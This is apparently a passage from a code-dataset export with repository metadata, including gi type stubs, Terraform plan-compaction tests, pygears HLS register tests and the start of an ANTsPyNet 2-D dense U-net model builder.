content_type='application/json')
responses.add("GET", '/v1/models/1/endpoints/1',
body=json.dumps(mdl_endpoint_1.to_dict()),
status=200,
content_type='application/json')
responses.add("PUT", '/v1/models/1/endpoints/1',
body=json.dumps(mdl_endpoint_1.to_dict()),
status=200,
content_type='application/json')
endpoint = model.serve_traffic({ve: 100})
assert endpoint.id == str(mdl_endpoint_1.id)
assert endpoint.environment_name == env_1.name == mdl_endpoint_1.environment_name
| 43.532515
| 118
| 0.536627
| 3,790
| 35,479
| 4.83905
| 0.077045
| 0.024537
| 0.073173
| 0.086478
| 0.859978
| 0.81374
| 0.788441
| 0.775954
| 0.762977
| 0.752563
| 0
| 0.034253
| 0.344175
| 35,479
| 814
| 119
| 43.585995
| 0.753954
| 0.02858
| 0
| 0.763473
| 0
| 0
| 0.152877
| 0.068016
| 0
| 0
| 0
| 0
| 0.136228
| 1
| 0.038922
| false
| 0
| 0.017964
| 0
| 0.076347
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b3e5ac95b0f55b785c0c0639b63cd3b059455db9
| 94
|
py
|
Python
|
borca/parsing/__init__.py
|
AndrewSpittlemeister/borca
|
10fd89ad12fd2b846637dbed01f74508dd3bb764
|
[
"MIT"
] | 4
|
2020-01-23T23:41:44.000Z
|
2020-04-22T19:24:55.000Z
|
borca/parsing/__init__.py
|
AndrewSpittlemeister/borca
|
10fd89ad12fd2b846637dbed01f74508dd3bb764
|
[
"MIT"
] | 1
|
2020-03-11T04:40:05.000Z
|
2020-03-18T21:43:00.000Z
|
borca/parsing/__init__.py
|
AndrewSpittlemeister/borca
|
10fd89ad12fd2b846637dbed01f74508dd3bb764
|
[
"MIT"
] | null | null | null |
from borca.parsing.data_format import Task, BorcaData
from borca.parsing.parser import Parser
| 31.333333
| 53
| 0.851064
| 14
| 94
| 5.642857
| 0.642857
| 0.227848
| 0.405063
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095745
| 94
| 2
| 54
| 47
| 0.929412
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3758c8a44c80fc5a6611b80eaaaaae3f7ce34aac
| 173
|
py
|
Python
|
listener_module/steam/commands/__init__.py
|
alentoghostflame/StupidAlentoBot
|
c024bfb79a9ecb0d9fda5ddc4e361a0cb878baba
|
[
"MIT"
] | 1
|
2021-12-12T02:50:20.000Z
|
2021-12-12T02:50:20.000Z
|
listener_module/steam/commands/__init__.py
|
alentoghostflame/StupidAlentoBot
|
c024bfb79a9ecb0d9fda5ddc4e361a0cb878baba
|
[
"MIT"
] | 17
|
2020-02-07T23:40:36.000Z
|
2020-12-22T16:38:44.000Z
|
listener_module/steam/commands/__init__.py
|
alentoghostflame/StupidAlentoBot
|
c024bfb79a9ecb0d9fda5ddc4e361a0cb878baba
|
[
"MIT"
] | null | null | null |
from listener_module.steam.commands.steam_commands import steam_announcement_control
from listener_module.steam.commands.steam_announcement_task import announcement_checker
| 57.666667
| 87
| 0.919075
| 22
| 173
| 6.863636
| 0.454545
| 0.258278
| 0.238411
| 0.304636
| 0.476821
| 0.476821
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046243
| 173
| 2
| 88
| 86.5
| 0.915152
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
37718f0e9825ef8c459e5caa21edf2a432892797
| 2,057
|
py
|
Python
|
pyy1/.pycharm_helpers/python_stubs/-1550516950/gi/_gi/ObjectInfo.py
|
pyy1988/pyy_test1
|
6bea878409e658aa87441384419be51aaab061e7
|
[
"Apache-2.0"
] | null | null | null |
pyy1/.pycharm_helpers/python_stubs/-1550516950/gi/_gi/ObjectInfo.py
|
pyy1988/pyy_test1
|
6bea878409e658aa87441384419be51aaab061e7
|
[
"Apache-2.0"
] | null | null | null |
pyy1/.pycharm_helpers/python_stubs/-1550516950/gi/_gi/ObjectInfo.py
|
pyy1988/pyy_test1
|
6bea878409e658aa87441384419be51aaab061e7
|
[
"Apache-2.0"
] | null | null | null |
# encoding: utf-8
# module gi._gi
# from /usr/lib/python3/dist-packages/gi/_gi.cpython-35m-x86_64-linux-gnu.so
# by generator 1.145
# no doc
# imports
import _gobject as _gobject # <module '_gobject'>
import _glib as _glib # <module '_glib'>
import gi as __gi
import gobject as __gobject
class ObjectInfo(__gi.RegisteredTypeInfo):
# no doc
def find_method(self, *args, **kwargs): # real signature unknown
pass
def find_vfunc(self, *args, **kwargs): # real signature unknown
pass
def get_abstract(self, *args, **kwargs): # real signature unknown
pass
def get_class_struct(self, *args, **kwargs): # real signature unknown
pass
def get_constants(self, *args, **kwargs): # real signature unknown
pass
def get_fields(self, *args, **kwargs): # real signature unknown
pass
def get_fundamental(self, *args, **kwargs): # real signature unknown
pass
def get_get_value_function(self, *args, **kwargs): # real signature unknown
pass
def get_interfaces(self, *args, **kwargs): # real signature unknown
pass
def get_methods(self, *args, **kwargs): # real signature unknown
pass
def get_parent(self, *args, **kwargs): # real signature unknown
pass
def get_properties(self, *args, **kwargs): # real signature unknown
pass
def get_ref_function(self, *args, **kwargs): # real signature unknown
pass
def get_set_value_function(self, *args, **kwargs): # real signature unknown
pass
def get_signals(self, *args, **kwargs): # real signature unknown
pass
def get_type_init(self, *args, **kwargs): # real signature unknown
pass
def get_type_name(self, *args, **kwargs): # real signature unknown
pass
def get_unref_function(self, *args, **kwargs): # real signature unknown
pass
def get_vfuncs(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
| 26.714286
| 79
| 0.654351
| 262
| 2,057
| 4.958015
| 0.240458
| 0.123172
| 0.21555
| 0.277136
| 0.712856
| 0.712856
| 0.712856
| 0.712856
| 0.614319
| 0.241724
| 0
| 0.007673
| 0.239669
| 2,057
| 76
| 80
| 27.065789
| 0.82289
| 0.312105
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0.444444
| 0.088889
| 0
| 0.555556
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
807fc8480dcc08c9859b3269e772f86ca23ed5a6
| 149
|
py
|
Python
|
build_depsjs.py
|
ludios/Coreweb
|
735f2636553ff8bb08b86cc0687f5e8b7c484035
|
[
"BSD-3-Clause"
] | null | null | null |
build_depsjs.py
|
ludios/Coreweb
|
735f2636553ff8bb08b86cc0687f5e8b7c484035
|
[
"BSD-3-Clause"
] | null | null | null |
build_depsjs.py
|
ludios/Coreweb
|
735f2636553ff8bb08b86cc0687f5e8b7c484035
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
from coreweb._closurebuild.depsjs import write_depsjs
write_depsjs(['js_coreweb ../../../js_coreweb'], "js_coreweb/deps.js")
| 24.833333
| 70
| 0.744966
| 21
| 149
| 5
| 0.571429
| 0.257143
| 0.209524
| 0.342857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073826
| 149
| 5
| 71
| 29.8
| 0.76087
| 0.134228
| 0
| 0
| 0
| 0
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
809326aecc580d61f81e931b5b2da331cac35df5
| 9,084
|
py
|
Python
|
terraform/executor/test_compact_plan.py
|
kelveden/circleci-orbs
|
8e1067afcffbfb0bb46feb245207b1324b5290c0
|
[
"MIT"
] | 44
|
2018-12-19T16:50:38.000Z
|
2022-03-21T11:30:46.000Z
|
terraform/executor/test_compact_plan.py
|
kelveden/circleci-orbs
|
8e1067afcffbfb0bb46feb245207b1324b5290c0
|
[
"MIT"
] | 114
|
2018-12-06T13:34:51.000Z
|
2022-02-28T15:03:38.000Z
|
terraform/executor/test_compact_plan.py
|
kelveden/circleci-orbs
|
8e1067afcffbfb0bb46feb245207b1324b5290c0
|
[
"MIT"
] | 53
|
2019-02-04T12:20:12.000Z
|
2022-03-16T17:17:29.000Z
|
from compact_plan import compact_plan
def test_plan_11():
input = """Refreshing Terraform state in-memory prior to plan...
The refreshed state will be used to calculate this plan, but will not be
persisted to local or remote state storage.
------------------------------------------------------------------------
An execution plan has been generated and is shown below.
Resource actions are indicated with the following symbols:
+ create
Terraform will perform the following actions:
+ random_string.my_string
id: <computed>
length: "11"
lower: "true"
min_lower: "0"
min_numeric: "0"
min_special: "0"
min_upper: "0"
number: "true"
result: <computed>
special: "true"
upper: "true"
Plan: 1 to add, 0 to change, 0 to destroy.
"""
expected_output = """An execution plan has been generated and is shown below.
Resource actions are indicated with the following symbols:
+ create
Terraform will perform the following actions:
+ random_string.my_string
id: <computed>
length: "11"
lower: "true"
min_lower: "0"
min_numeric: "0"
min_special: "0"
min_upper: "0"
number: "true"
result: <computed>
special: "true"
upper: "true"
Plan: 1 to add, 0 to change, 0 to destroy."""
output = '\n'.join(compact_plan(input.splitlines()))
assert output == expected_output
def test_plan_12():
input = """Refreshing Terraform state in-memory prior to plan...
The refreshed state will be used to calculate this plan, but will not be
persisted to local or remote state storage.
------------------------------------------------------------------------
An execution plan has been generated and is shown below.
Resource actions are indicated with the following symbols:
+ create
Terraform will perform the following actions:
# random_string.my_string will be created
+ resource "random_string" "my_string" {
+ id = (known after apply)
+ length = 11
+ lower = true
+ min_lower = 0
+ min_numeric = 0
+ min_special = 0
+ min_upper = 0
+ number = true
+ result = (known after apply)
+ special = true
+ upper = true
}
Plan: 1 to add, 0 to change, 0 to destroy.
"""
expected_output = """An execution plan has been generated and is shown below.
Resource actions are indicated with the following symbols:
+ create
Terraform will perform the following actions:
# random_string.my_string will be created
+ resource "random_string" "my_string" {
+ id = (known after apply)
+ length = 11
+ lower = true
+ min_lower = 0
+ min_numeric = 0
+ min_special = 0
+ min_upper = 0
+ number = true
+ result = (known after apply)
+ special = true
+ upper = true
}
Plan: 1 to add, 0 to change, 0 to destroy."""
output = '\n'.join(compact_plan(input.splitlines()))
assert output == expected_output
def test_plan_14():
input = """
An execution plan has been generated and is shown below.
Resource actions are indicated with the following symbols:
+ create
Terraform will perform the following actions:
# random_string.my_string will be created
+ resource "random_string" "my_string" {
+ id = (known after apply)
+ length = 11
+ lower = true
+ min_lower = 0
+ min_numeric = 0
+ min_special = 0
+ min_upper = 0
+ number = true
+ result = (known after apply)
+ special = true
+ upper = true
}
Plan: 1 to add, 0 to change, 0 to destroy.
Changes to Outputs:
+ s = "string"
"""
expected_output = """An execution plan has been generated and is shown below.
Resource actions are indicated with the following symbols:
+ create
Terraform will perform the following actions:
# random_string.my_string will be created
+ resource "random_string" "my_string" {
+ id = (known after apply)
+ length = 11
+ lower = true
+ min_lower = 0
+ min_numeric = 0
+ min_special = 0
+ min_upper = 0
+ number = true
+ result = (known after apply)
+ special = true
+ upper = true
}
Plan: 1 to add, 0 to change, 0 to destroy.
Changes to Outputs:
+ s = "string\""""
output = '\n'.join(compact_plan(input.splitlines()))
assert output == expected_output
def test_error_11():
input = """
Error: random_string.my_string: length: cannot parse '' as int: strconv.ParseInt: parsing "ten": invalid syntax
"""
expected_output = """Error: random_string.my_string: length: cannot parse '' as int: strconv.ParseInt: parsing "ten": invalid syntax
"""
output = '\n'.join(compact_plan(input.splitlines()))
assert output == expected_output
def test_error_12():
input = """
Error: Incorrect attribute value type
on main.tf line 2, in resource "random_string" "my_string":
2: length = "ten"
Inappropriate value for attribute "length": a number is required.
"""
expected_output = """Error: Incorrect attribute value type
on main.tf line 2, in resource "random_string" "my_string":
2: length = "ten"
Inappropriate value for attribute "length": a number is required."""
output = '\n'.join(compact_plan(input.splitlines()))
assert output == expected_output
def test_no_change_11():
input = """Refreshing Terraform state in-memory prior to plan...
The refreshed state will be used to calculate this plan, but will not be
persisted to local or remote state storage.
------------------------------------------------------------------------
No changes. Infrastructure is up-to-date.
This means that Terraform did not detect any differences between your
configuration and real physical resources that exist. As a result, no
actions need to be performed.
"""
expected_output = """No changes. Infrastructure is up-to-date.
This means that Terraform did not detect any differences between your
configuration and real physical resources that exist. As a result, no
actions need to be performed."""
output = '\n'.join(compact_plan(input.splitlines()))
assert output == expected_output
def test_no_change_14():
input = """
No changes. Infrastructure is up-to-date.
This means that Terraform did not detect any differences between your
configuration and real physical resources that exist. As a result, no
actions need to be performed.
"""
expected_output = """No changes. Infrastructure is up-to-date.
This means that Terraform did not detect any differences between your
configuration and real physical resources that exist. As a result, no
actions need to be performed."""
output = '\n'.join(compact_plan(input.splitlines()))
assert output == expected_output
def test_no_output():
input = """
This is not anything like terraform output we know. We want this to be output unchanged.
This should protect against the output changing again.
"""
expected_output = """
This is not anything like terraform output we know. We want this to be output unchanged.
This should protect against the output changing again."""
output = '\n'.join(compact_plan(input.splitlines()))
assert output == expected_output
def test_plan_1_0():
input_one = """
STATE_REFRESH_1
STATE_REFRESH_2
Terraform used the selected providers to generate the following execution
plan. Resource actions are indicated with the following symbols:
+ create
Terraform will perform the following actions:
# random_string.my_string will be created
+ random_string.my_string
+ id: <computed>
+ length: "11"
+ lower: "true"
+ min_lower: "0"
+ min_numeric: "0"
+ min_special: "0"
+ min_upper: "0"
+ number: "true"
+ result: <computed>
+ special: "true"
+ upper: "true"
Plan: 1 to add, 0 to change, 0 to destroy."""
input_two = """
STATE_REFRESH_2
STATE_REFRESH_1
Terraform used the selected providers to generate the following execution
plan. Resource actions are indicated with the following symbols:
+ create
Terraform will perform the following actions:
# random_string.my_string will be created
+ random_string.my_string
+ id: <computed>
+ length: "11"
+ lower: "true"
+ min_lower: "0"
+ min_numeric: "0"
+ min_special: "0"
+ min_upper: "0"
+ number: "true"
+ result: <computed>
+ special: "true"
+ upper: "true"
Plan: 1 to add, 0 to change, 0 to destroy."""
clipped_output_one = list(compact_plan(input_one.splitlines()))
clipped_output_two = list(compact_plan(input_two.splitlines()))
assert clipped_output_one == clipped_output_two
assert len(clipped_output_one) > 0
| 28.566038
| 136
| 0.633311
| 1,157
| 9,084
| 4.852204
| 0.12446
| 0.0171
| 0.044888
| 0.064125
| 0.936231
| 0.936231
| 0.936231
| 0.936231
| 0.936231
| 0.936231
| 0
| 0.014383
| 0.257596
| 9,084
| 317
| 137
| 28.656151
| 0.818061
| 0
| 0
| 0.872428
| 0
| 0
| 0.817812
| 0.054381
| 0
| 0
| 0
| 0
| 0.041152
| 1
| 0.037037
| false
| 0
| 0.004115
| 0
| 0.041152
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
03b93c8be29c5ea9ef23d76994bb6d35e666d666
| 145
|
py
|
Python
|
03 Operators and Operands/assignmentoperators.py
|
Himanshu44626748/Learn-Python
|
f3a4d997f2d29b146e5f7434f4801ae94bc3483f
|
[
"MIT"
] | 2
|
2020-03-16T14:57:44.000Z
|
2020-11-29T07:45:54.000Z
|
03 Operators and Operands/assignmentoperators.py
|
Himanshu44626748/Learn-Python
|
f3a4d997f2d29b146e5f7434f4801ae94bc3483f
|
[
"MIT"
] | null | null | null |
03 Operators and Operands/assignmentoperators.py
|
Himanshu44626748/Learn-Python
|
f3a4d997f2d29b146e5f7434f4801ae94bc3483f
|
[
"MIT"
] | 1
|
2020-08-13T07:59:02.000Z
|
2020-08-13T07:59:02.000Z
|
a=b=c=10
print(a,b,c)
x,y = 5,2
x+=y
print(x)
x-=y
print(x)
x*=y
print(x)
x/=y
print(x)
x%=y
print(x)
x+=6
x**=y
print(x)
x//=y
print(x)
| 5.37037
| 12
| 0.517241
| 42
| 145
| 1.785714
| 0.238095
| 0.213333
| 0.653333
| 0.746667
| 0.76
| 0.76
| 0.76
| 0.76
| 0.546667
| 0.546667
| 0
| 0.042735
| 0.193103
| 145
| 26
| 13
| 5.576923
| 0.598291
| 0
| 0
| 0.388889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.444444
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
03e77609ddaeb6c6961c70709f7d4f6db4ba7c93
| 117
|
py
|
Python
|
python/testData/formatter/multilineElifConditionInParentheses_after.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/formatter/multilineElifConditionInParentheses_after.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/formatter/multilineElifConditionInParentheses_after.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
if (foo and
bar == 42):
pass
elif (foo and
bar):
pass
elif (foo and
bar == 24):
pass
| 11.7
| 19
| 0.452991
| 17
| 117
| 3.117647
| 0.470588
| 0.339623
| 0.509434
| 0.528302
| 0.641509
| 0
| 0
| 0
| 0
| 0
| 0
| 0.060606
| 0.435897
| 117
| 9
| 20
| 13
| 0.742424
| 0
| 0
| 0.555556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
2062db296873f3653e04cfe877680b09e13a9b7e
| 2,038
|
py
|
Python
|
tests/hls/test_reg.py
|
bogdanvuk/pygears
|
a0b21d445e1d5c89ad66751447b8253536b835ee
|
[
"MIT"
] | 120
|
2018-04-23T08:29:04.000Z
|
2022-03-30T14:41:52.000Z
|
tests/hls/test_reg.py
|
FZP1607152286/pygears
|
a0b21d445e1d5c89ad66751447b8253536b835ee
|
[
"MIT"
] | 12
|
2019-07-09T17:12:58.000Z
|
2022-03-18T09:05:10.000Z
|
tests/hls/test_reg.py
|
FZP1607152286/pygears
|
a0b21d445e1d5c89ad66751447b8253536b835ee
|
[
"MIT"
] | 12
|
2019-05-10T19:42:08.000Z
|
2022-03-28T18:26:44.000Z
|
from pygears import gear, Intf, find
from pygears.typing import Queue, Uint
from pygears.hls.translate import translate_gear
def test_update_after_in_loop():
@gear(hdl={'compile': True})
async def test(din: Queue[Uint]) -> b'din':
acc = din.dtype.data(0)
async for d, eot in din:
acc = d + acc
if eot:
yield acc, eot
test(Intf(Queue[Uint[8]]))
ctx, res = translate_gear(find('/test'))
assert ctx.scope['acc'].reg
# Value for 'acc' is set a new every loop, so it isn't a register
def test_update_after_in_loop_ifelse_trap():
@gear(hdl={'compile': True})
async def test(din: Queue[Uint]) -> b'din':
acc = din.dtype.data(0)
async for d, eot in din:
if d > 0:
acc = 1
else:
acc = 0
acc = d + acc
if eot:
yield acc, eot
test(Intf(Queue[Uint[8]]))
ctx, res = translate_gear(find('/test'))
assert not ctx.scope['acc'].reg
# Value for 'acc' is set only conditionaly at the beggining of the loop, so it
# has to be a register
def test_update_after_in_loop_if_trap():
@gear(hdl={'compile': True})
async def test(din: Queue[Uint]) -> b'din':
acc = din.dtype.data(0)
async for d, eot in din:
if d > 0:
acc = 1
acc = d + acc
if eot:
yield acc, eot
test(Intf(Queue[Uint[8]]))
ctx, res = translate_gear(find('/test'))
assert ctx.scope['acc'].reg
def test_update_after_in_loop_ifelif():
@gear(hdl={'compile': True})
async def test(din: Queue[Uint]) -> b'din':
acc = din.dtype.data(0)
async for d, eot in din:
if d > 0:
acc = 1
elif d < 2:
acc = 0
acc = d + acc
if eot:
yield acc, eot
test(Intf(Queue[Uint[8]]))
ctx, res = translate_gear(find('/test'))
assert ctx.scope['acc'].reg
| 22.395604
| 78
| 0.530422
| 295
| 2,038
| 3.576271
| 0.223729
| 0.076777
| 0.049289
| 0.068246
| 0.809479
| 0.809479
| 0.763981
| 0.763981
| 0.701422
| 0.65782
| 0
| 0.012734
| 0.344946
| 2,038
| 90
| 79
| 22.644444
| 0.777528
| 0.078999
| 0
| 0.824561
| 0
| 0
| 0.038441
| 0
| 0
| 0
| 0
| 0
| 0.070175
| 1
| 0.070175
| false
| 0
| 0.052632
| 0
| 0.122807
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
20b312eb86622d6061e613dbf8490b6f0be77c84
| 19,534
|
py
|
Python
|
ext/ANTsPyNet/antspynet/architectures/create_denseunet_model.py
|
tsmonteiro/fmri_proc
|
ee740cfa3c3a7ef8e1ee1ebd3b286a66712e0ec1
|
[
"MIT"
] | 2
|
2021-11-16T10:00:33.000Z
|
2021-12-13T02:57:40.000Z
|
ext/ANTsPyNet/antspynet/architectures/create_denseunet_model.py
|
tsmonteiro/fmri_proc
|
ee740cfa3c3a7ef8e1ee1ebd3b286a66712e0ec1
|
[
"MIT"
] | null | null | null |
ext/ANTsPyNet/antspynet/architectures/create_denseunet_model.py
|
tsmonteiro/fmri_proc
|
ee740cfa3c3a7ef8e1ee1ebd3b286a66712e0ec1
|
[
"MIT"
] | 1
|
2021-12-13T02:57:27.000Z
|
2021-12-13T02:57:27.000Z
|
import tensorflow as tf
import tensorflow.keras.backend as K
from tensorflow.keras.models import Model
from tensorflow.keras.layers import (Input, Dropout, BatchNormalization, Add,
Concatenate, Dense, Activation,
Conv2D, Conv2DTranspose, AveragePooling2D,
MaxPooling2D, UpSampling2D, ZeroPadding2D,
Conv3D, Conv3DTranspose, AveragePooling3D,
MaxPooling3D, UpSampling3D, ZeroPadding3D)
from tensorflow.keras import initializers
from tensorflow.keras import regularizers
from ..utilities import Scale
def create_denseunet_model_2d(input_image_size,
number_of_outputs=1,
number_of_layers_per_dense_block=(6, 12, 36, 24),
growth_rate=48,
initial_number_of_filters=96,
reduction_rate=0.0,
depth=7,
dropout_rate=0.0,
weight_decay=1e-4,
mode='classification'
):
"""
2-D implementation of the dense U-net deep learning architecture.
Creates a keras model of the dense U-net deep learning architecture for
image segmentation
X. Li, H. Chen, X. Qi, Q. Dou, C.-W. Fu, P.-A. Heng. H-DenseUNet: Hybrid
Densely Connected UNet for Liver and Tumor Segmentation from CT Volumes
available here:
https://arxiv.org/pdf/1709.07330.pdf
with the author's implementation available at:
https://github.com/xmengli999/H-DenseUNet
Arguments
---------
input_image_size : tuple of length 3
Used for specifying the input tensor shape. The
shape (or dimension) of that tensor is the image dimensions followed by
the number of channels (e.g., red, green, and blue). The batch size
(i.e., number of training images) is not specified a priori.
number_of_outputs : integer
Meaning depends on the mode. For 'classification' this is the number of
segmentation labels. For 'regression' this is the number of outputs.
number_of_layers_per_dense_blocks : tuple
Number of dense blocks per layer.
growth_rate : integer
Number of filters to add for each dense block layer (default = 48).
initial_number_of_filters : integer
Number of filters at the beginning (default = 96).
reduction_rate : scalar
Reduction factor of transition blocks.
depth : integer
Number of layers---must be equal to 3 * N + 4 where N is an integer
(default = 7).
dropout_rate : scalar
Float between 0 and 1 to use between dense layers.
weight_decay : scalar
Weighting parameter for L2 regularization of the kernel weights of the
convolution layers (default = 1e-4).
Returns
-------
Keras model
A 2-D Keras model defining the network.
Example
-------
>>> model = create_denseunet_model_2d((128, 128, 1))
>>> model.summary()
"""
concatenation_axis=1
if K.image_data_format() == 'channels_last':
concatenation_axis=-1
def convolution_factory_2d(model, number_of_filters,
kernel_size=(3, 3),
dropout_rate=0.0, weight_decay=1e-4):
# Bottleneck layer
model = BatchNormalization(axis=concatenation_axis)(model)
model = Scale(axis=concatenation_axis)(model)
model = Activation('relu')(model)
model = Conv2D(filters=(number_of_filters * 4),
kernel_size=(1, 1),
use_bias=False)(model)
if dropout_rate > 0.0:
model = Dropout(rate=dropout_rate)(model)
# Convolution layer
model = BatchNormalization(axis=concatenation_axis,
epsilon=1.1e-5)(model)
model = Scale(axis=concatenation_axis)(model)
model = Activation(activation='relu')(model)
model = ZeroPadding2D(padding=(1, 1))(model)
model = Conv2D(filters=number_of_filters,
kernel_size=kernel_size,
use_bias=False)(model)
if dropout_rate > 0.0:
model = Dropout(rate=dropout_rate)(model)
return(model)
def transition_2d(model, number_of_filters, compression_rate=1.0,
dropout_rate=0.0, weight_decay=1e-4):
model = BatchNormalization(axis=concatenation_axis,
gamma_regularizer=regularizers.l2(weight_decay),
beta_regularizer=regularizers.l2(weight_decay))(model)
model = Scale(axis=concatenation_axis)(model)
model = Activation(activation='relu')(model)
model = Conv2D(filters=int(number_of_filters * compression_rate),
kernel_size=(1, 1),
use_bias=False)(model)
if dropout_rate > 0.0:
model = Dropout(rate=dropout_rate)(model)
model = AveragePooling2D(pool_size=(2, 2),
strides=(2, 2))(model)
return(model)
def create_dense_blocks_2d(model, number_of_filters, depth, growth_rate,
dropout_rate=0.0, weight_decay=1e-4):
dense_block_layers = [model]
for i in range(depth):
model = convolution_factory_2d(model, number_of_filters=growth_rate,
kernel_size=(3, 3), dropout_rate=dropout_rate,
weight_decay=weight_decay)
dense_block_layers.append(model)
model = Concatenate(axis=concatenation_axis)(dense_block_layers)
number_of_filters += growth_rate
return(model, number_of_filters)
if ((depth - 4) % 3) != 0:
raise ValueError('Depth must be equal to 3*N+4 where N is an integer.')
number_of_layers = int((depth - 4) % 3)
number_of_dense_blocks = len(number_of_layers_per_dense_block)
inputs = Input(shape = input_image_size)
box_layers = []
box_count = 1
# Initial convolution
outputs = ZeroPadding2D(padding=(3, 3))(inputs)
outputs = Conv2D(filters=initial_number_of_filters,
kernel_size=(7, 7),
strides=(2, 2),
use_bias=False)(outputs)
outputs = BatchNormalization(epsilon=1.1e-5,
axis=concatenation_axis)(outputs)
outputs = Scale(axis=concatenation_axis)(outputs)
outputs = Activation(activation='relu')(outputs)
box_layers.append(outputs)
box_count += 1
outputs = ZeroPadding2D(padding=(1, 1))(outputs)
outputs = MaxPooling2D(pool_size=(3, 3),
strides=(2, 2))(outputs)
# Add dense blocks
nFilters = initial_number_of_filters
for i in range(number_of_dense_blocks - 1):
outputs, number_of_filters = \
create_dense_blocks_2d(outputs, number_of_filters=nFilters,
depth=number_of_layers_per_dense_block[i],
growth_rate=growth_rate, dropout_rate=dropout_rate,
weight_decay=weight_decay)
box_layers.append(outputs)
box_count += 1
outputs = transition_2d(outputs, number_of_filters=number_of_filters,
compression_rate=(1.0 - reduction_rate),
dropout_rate=dropout_rate, weight_decay=weight_decay)
nFilters = int(number_of_filters * (1 - reduction_rate))
outputs, nFilters = \
create_dense_blocks_2d(outputs, number_of_filters=nFilters,
depth=number_of_layers_per_dense_block[number_of_dense_blocks - 1],
growth_rate=growth_rate, dropout_rate=dropout_rate,
weight_decay=weight_decay)
outputs = BatchNormalization(epsilon=1.1e-5,
axis=concatenation_axis)(outputs)
outputs = Scale(axis=concatenation_axis)(outputs)
outputs = Activation(activation='relu')(outputs)
box_layers.append(outputs)
box_count -= 1
local_number_of_filters = (K.int_shape(box_layers[box_count]))[-1]
local_layer = Conv2D(filters=local_number_of_filters,
kernel_size=(1, 1),
padding='same',
kernel_initializer='normal')(box_layers[box_count - 1])
box_count -= 1
for i in range(number_of_dense_blocks - 1):
